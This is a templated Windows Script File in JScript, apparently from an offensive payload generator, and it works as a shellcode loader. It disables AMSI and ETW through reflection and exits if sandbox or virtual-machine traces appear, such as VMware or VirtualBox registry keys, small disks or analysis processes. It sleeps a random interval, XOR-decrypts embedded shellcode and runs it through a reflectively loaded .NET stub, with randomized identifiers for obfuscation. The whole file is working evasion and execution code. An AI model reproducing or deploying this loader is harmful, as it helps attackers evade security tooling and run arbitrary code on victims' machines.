<?xml version="1.0" encoding="utf-8"?>
<package>
<job id="{{ v.job_id }}">
<script language="JScript">
<![CDATA[
function {{ v.fn_build_str }}(a){var s="";for(var i=0;i<a.length;i++)s+=String.fromCharCode(a[i]);return s;}

function {{ v.fn_amsi }}() {
    try {
        var asm  = new ActiveXObject("System.Reflection.Assembly");
        var amsi = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_auto_amsi_utils }}]));
        if (amsi !== null) {
            amsi.GetField({{ v.fn_build_str }}([{{ v.jsc_amsi_init_fail }}]), 36).SetValue(null, true);
        }
    } catch(e) {}
}

function {{ v.fn_etw }}() {
    try {
        var asm = new ActiveXObject("System.Reflection.Assembly");
        var t = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_eventing_ep }}]));
        if (t !== null) {
            var fi = t.GetField({{ v.fn_build_str }}([{{ v.jsc_m_enabled }}]), 36);
            if (fi !== null) fi.SetValue(null, 0);
        }
    } catch(e) {}
}

function {{ v.fn_sandbox }}() {
    try {
        var wmi = GetObject("winmgmts:");
        var pq = wmi.ExecQuery("SELECT Name FROM Win32_Process");
        var bad = ["vmtoolsd.exe","vboxservice.exe","cuckoo.exe","vmsrvc.exe","qemu-ga.exe"];
        for (var e = new Enumerator(pq); !e.atEnd(); e.moveNext()) {
            var n = e.item().Name.toLowerCase();
            for (var i = 0; i < bad.length; i++) { if (n === bad[i]) return true; }
        }
        var mq = wmi.ExecQuery("SELECT ScreenWidth,ScreenHeight FROM Win32_DesktopMonitor");
        for (var e2 = new Enumerator(mq); !e2.atEnd(); e2.moveNext()) {
            var d = e2.item();
            if (d.ScreenWidth && d.ScreenWidth < 800) return true;
        }
    } catch(e2) {}
    // VM registry key checks
    try {
        var sh = new ActiveXObject("WScript.Shell");
        sh.RegRead("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Tools\\InstallPath");
        return true;
    } catch(e) {}
    try {
        var sh2 = new ActiveXObject("WScript.Shell");
        sh2.RegRead("HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions\\Version");
        return true;
    } catch(e) {}
    try {
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var drv = fso.GetDrive("C:");
        if (drv.TotalSize < 53687091200) return true;
    } catch(e) {}
    return false;
}

var {{ v.var_sc }}  = {% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %};
var {{ v.var_key }} = {% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %};

function {{ v.fn_hex2arr }}(h) {
    var a = []; for (var i = 0; i < h.length; i += 2)
        a.push(parseInt(h.substr(i, 2), 16));
    return a;
}

function {{ v.fn_decrypt }}(d, k) {
    var o = []; for (var i = 0; i < d.length; i++)
        o.push(d[i] ^ k[i % k.length]);
    return o;
}

function {{ v.fn_exec }}() {
    if ({{ v.fn_sandbox }}()) { WScript.Quit(0); }
    WScript.Sleep(2000 + Math.floor(Math.random() * 3000));
    {{ v.fn_amsi }}();
    {{ v.fn_etw }}();
    var sc  = {{ v.fn_decrypt }}({{ v.fn_hex2arr }}({{ v.var_sc }}), {{ v.fn_hex2arr }}({{ v.var_key }}));
    var loader = new ActiveXObject("System.Reflection.Assembly");
    var stub   = {{ v.fn_hex2arr }}("{{ v.dotnet_stub_hex }}");
    var asm    = loader.Load(stub);
    var t      = asm.GetType("Stub.Loader");
    var mi     = t.GetMethod("Run");
    mi.Invoke(null, [sc]);
}

{{ v.fn_exec }}();
]]>
</script>
</job>
</package>
